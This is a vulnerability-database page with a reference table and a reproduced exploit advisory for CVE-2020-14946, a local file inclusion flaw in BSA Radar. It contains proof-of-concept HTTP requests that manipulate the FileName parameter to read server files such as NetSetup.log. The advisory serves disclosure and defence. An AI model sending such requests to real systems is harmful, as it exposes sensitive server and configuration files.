| Reporter | Title | Published | Views | Family All 10 |
|---|---|---|---|---|
| BSA Radar 1.6.7234.24750 - Local File Inclusion Vulnerability | 14 Jul 202000:00 | – | zdt | |
| BSA Radar Information Disclosure (CVE-2020-14946) | 27 Jul 202000:00 | – | checkpoint_advisories | |
| CVE-2020-14946 | 22 Jun 202021:43 | – | cve | |
| CVE-2020-14946 | 22 Jun 202021:43 | – | cvelist | |
| EUVD-2020-7081 | 7 Oct 202500:30 | – | euvd | |
| CVE-2020-14946 | 22 Jun 202022:15 | – | nvd | |
| CVE-2020-14946 | 22 Jun 202022:15 | – | osv | |
| BSA Radar 1.6.7234.24750 Local File Inclusion | 14 Jul 202000:00 | – | packetstorm | |
| Code injection | 22 Jun 202022:15 | – | prion | |
| PT-2020-14082 · Global Radar · Global Radar Bsa Radar | 22 Jun 202000:00 | – | ptsecurity |
# Exploit title: BSA Radar 1.6.7234.24750 - Local File Inclusion
# Date: 2020-07-08
# Exploit Author: William Summerhill
# Vendor homepage: https://www.globalradar.com/
# Version: BSA Radar - Version 1.6.7234.24750 and lower
# CVE-2020-14946 - Local File Inclusion
# Description: The Administrator section of the Surveillance module in Global RADAR - BSA Radar 1.6.7234.X
# and lower allows users to download transaction files. When downloading the files,
# a user is able to view local files on the web server by manipulating the FileName
# and FilePath parameters in the URL, or while using a proxy. This vulnerability could
# be used to view local sensitive files or configuration files on the backend server.
Vulnerable endpoint: /UC/downloadFile.ashx
The current user is required to have valid privileges to send requests to the target vulnerable endpoint.
Proof of Concept:
HTTP Request PoC:
VALID REQUEST:
GET /UC/downloadFile.ashx?ID=XXXX&FileName=SOMEFILE.TXT&UploadStyle=1&UploadStyle=1&UploadSource=6
LFI EXPLOIT REQUEST:
GET /UC/downloadFile.ashx?ID=XXXX&FileName=C:\Windows\debug\NetSetup.log&UploadStyle=1&UploadSource=6
The entire LFI path can be injected into the "FileName" parameter in order to enumerate existing files on the server. Other LFI files can be tested (such as the Windows hosts file) for further verification and disclosures.
Tested on: Windows
CVE: CVE-2020-14946
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14946Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation